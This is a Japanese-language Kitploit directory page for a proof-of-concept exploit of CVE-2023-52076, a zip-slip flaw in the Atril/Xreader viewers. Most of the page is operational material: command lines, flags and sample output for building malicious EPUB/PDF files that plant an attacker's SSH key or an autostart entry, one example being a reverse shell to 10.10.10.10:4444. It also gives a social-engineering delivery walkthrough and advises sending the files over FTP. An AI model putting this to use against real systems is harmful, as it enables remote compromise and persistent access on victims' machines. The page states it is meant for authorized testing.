Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-52076-PoC — CVE-2023-52076のPoCエクスプロイト - Atril/Xreader (MATE/Cinnamon) におけるzip-slipパストラバーサル。細工されたEPUBを介して任意のファイル書き込みとRCEが可能になります。許可されたセキュリティテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/groppoxx/cve-2023-52076-poc
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストソーシャルエンジニアリングバイナリエクスプロイト
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

CVE-2023-52076のPoCエクスプロイト - Atril/Xreader (MATE/Cinnamon) におけるzip-slipパストラバーサル。細工されたEPUBを介して任意のファイル書き込みとRCEが可能になります。許可されたセキュリティテストのみを対象としています。

リポジトリを見る
324日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-52076-PoC

CVE-2023-52076 の概念実証(Proof-of-concept)です。これは、MATE Desktop 環境に影響する Atril/Xreader ドキュメントビューアにおける、重大なパストラバーサルおよび任意ファイル書き込みの脆弱性です。

このスクリプトは、SSH 設定または自動起動(autostart)デスクトップエントリのいずれかを標的とした zip-slip パスを含む細工済み EPUB ペイロードを生成し、標的システム上でのリモートコマンド実行を可能にします。

機能

  1. SSH キーインジェクションと autostart RCE の2つの悪用モードをサポート。
  2. RSA 鍵ペアを生成(SSH モードのみ)。
  3. 脆弱な展開処理を狙った zip-slip パスを埋め込んだ、有効な EPUB を構築。
  4. /proc/self/cwd ガジェットを使用して、5〜9種類のトラバーサルパスにペイロードを書き込み。
  5. .epub と .pdf のコピーを作成(どちらも脆弱性をトリガー)。
  6. ペイロードの構造を検証し、すべてのエントリを確認。
  7. 任意で、匿名 FTP 経由でペイロードをアップロード。

要件

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

クイックスタート

SSH モード(推奨)

SSH ペイロードをローカルで生成:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

Autostart モード

カスタムコマンドで autostart RCE ペイロードを生成:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

完全な使用例

SSH モード + FTP アップロード

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

出力例:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

Autostart モード + FTP アップロード

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

出力例:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

オプションフラグ

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

悪用手順

SSH モード

  1. ペイロードの生成: スクリプトが authorized_keys パスに公開鍵を含む EPUB を作成。
  2. ソーシャルエンジニアリング: EPUB/PDF を標的に送信(電子書籍に偽装)。
  3. 被害者がファイルを開く: Atril/Xreader が EPUB の内容を展開。
  4. パストラバーサル: 脆弱なコードが公開鍵を ~/.ssh/authorized_keys に書き込み。
  5. SSH アクセス: 攻撃者が秘密鍵を使用して接続。

Autostart モード

  1. ペイロードの生成: スクリプトが autostart パスに .desktop エントリを含む EPUB を作成。
  2. ソーシャルエンジニアリング: EPUB/PDF を標的に送信。
  3. 被害者がファイルを開く: Atril/Xreader が EPUB の内容を展開。
  4. パストラバーサル: 脆弱なコードが .desktop を ~/.config/autostart/ に書き込み。
  5. トリガー: 次回のログアウト/ログイン時に、.desktop ファイルがコマンドを自動実行。

重要なポイント

  • ユーザー名は不要: /proc/self/cwd ガジェットは展開時に解決されます。
  • 複数のパスバリエーション: SSH 用に9パス、autostart 用に5パスで、ディレクトリ深度に関係なく成功率を最大化。
  • ファイルの上書きなし: 新規ファイルのみを作成(CVE の制限に準拠)。
  • オフラインモード: FTP 配信なしでペイロードを生成可能(必要な場合のみ --upload を使用)。
  • 柔軟なコマンド: Autostart モードは任意の bash コマンドをサポート。
  • SSH モードは即時: ファイルを開いた後は被害者の操作は不要。
  • Autostart は再ログインが必要: RCE をトリガーするには被害者のログアウト/ログインが必要。

備考

  • 影響を受けるバージョン: Atril (MATE DE)、Xreader (Cinnamon, Linux Mint) < 1.26.2。
  • 検証済み環境: Kali Linux、Parrot OS、Ubuntu-Mate、Xubuntu。
  • 被害者が脆弱なビューアで細工されたドキュメントを開く必要があります。
  • オフラインで動作。悪用中に攻撃者へのネットワークコールバックはありません。
  • ベストプラクティス: 直接ホスティングを避けるため、FTP(--upload)で配信。

法的免責事項

この PoC は、許可を得たセキュリティテスト、ラボ環境、および脆弱性の検証を目的としています。 明示的な許可なくシステムに対して使用しないでください。

ツールをダウンロード